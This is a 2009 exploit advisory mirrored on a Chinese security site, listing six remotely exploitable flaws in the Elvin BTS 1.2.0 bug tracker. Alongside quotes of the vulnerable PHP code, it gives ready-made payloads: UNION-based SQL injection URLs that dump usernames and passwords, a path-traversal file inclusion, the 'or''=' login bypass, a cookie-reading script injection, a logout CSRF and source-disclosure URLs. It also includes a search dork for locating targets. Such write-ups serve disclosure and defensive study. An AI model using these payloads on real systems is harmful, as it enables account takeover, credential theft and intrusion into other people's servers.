首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Elvin BTS 1.2.0 Multiple Remote Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-06-17  
#################################################################################################################
[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

- Script Homepage : http://www.elvinbts.org/
- Google Dork : Powered by Elvin Bug Tracking Server.

Elvin BTS suffers from a lot of vunerabilities

1) SQL Injection
2) Local File Inclusion
3) SQL Injection Login Bypass
4) Cross-Site Scripting
5) Cross-Site Request Forgery
6) Source Code Disclosure


----------------------- 1) SQL Injection ----------------------- 

- Vulnerable code is everywhere.I will present only 2 PoC's.

 a) Vulnerable code in show_bug.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

     http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--

  b) Vulnerable code in show_activity.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. "");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

     http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--


----------------------- 2) Local File Inclusion ----------------------- 

- Vulnerable code in page.php


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$filename = "pages/".$_GET['id'];
................................................
if(file_exists($filename)){
include($filename);
} else {
echo "<h2>Sorry page cannot be found!</h2>";
}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

       http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK



----------------------- 3) SQL Injection Login Bypass----------------------- 

- Code in login.php ( in login.php is included the vulnerable code)

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
include(LoadElvinModule('login.ei'));
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


- Vulnerable code in inc/login.ei

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'");
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC 

Login as :
  
 Username : 'or''='
 Password : 'or''='


----------------------- 4) Cross-Site Scripting----------------------- 

It's more XSS's in the script,but tired to find them all.

- Vulnerable code in show_activity.php

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<p>Back to bug # <a href="show_bug.php?id=<?php echo $_GET['id']; ?>"><?php echo $_GET['id']; ?></a></a></p>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC

    http://127.0.0.1/[path]/show_activity.php?id=<script>alert(document.cookie)</script>



----------------------- 5) Cross-Site Request Forgery----------------------- 

Logout CSRF

 - PoC

   http://127.0.0.1/[path]/login.php?logout



----------------------- 6) Source Code Disclosure----------------------- 

Go to /inc/ directory.You will se .ei files with php code inside.
That files are included and used by the script.

 - PoC's

    http://127.0.0.1/[path]/inc/login.ei
    http://127.0.0.1/[path]/inc/jump_bug.ei
    http://127.0.0.1/[path]/inc/create_account.ei

Etc..

############################################### EOF ##################################################

# [2009-06-15]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DB Top Sites 1.0 (index.php u)
·AdaptWeb 0.9.2 (LFI/SQL) Multi
·DB Top Sites 1.0 Remote Comman
·LinkLogger 2.4.10.15 (syslog)
·FormMail 1.92 Multiple Remote
·Evernew Free Joke Script 1.2 R
·SugarCRM 5.2.0e Remote Code Ex
·Apple Safari & Quicktime Denia
·Mundi Mail 0.8.2 (top) Remote
·TorrentTrader Classic 1.09 Mul
·Impleo Music Collection 2.0 (S
·Joomla Component com_ijoomla_r
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved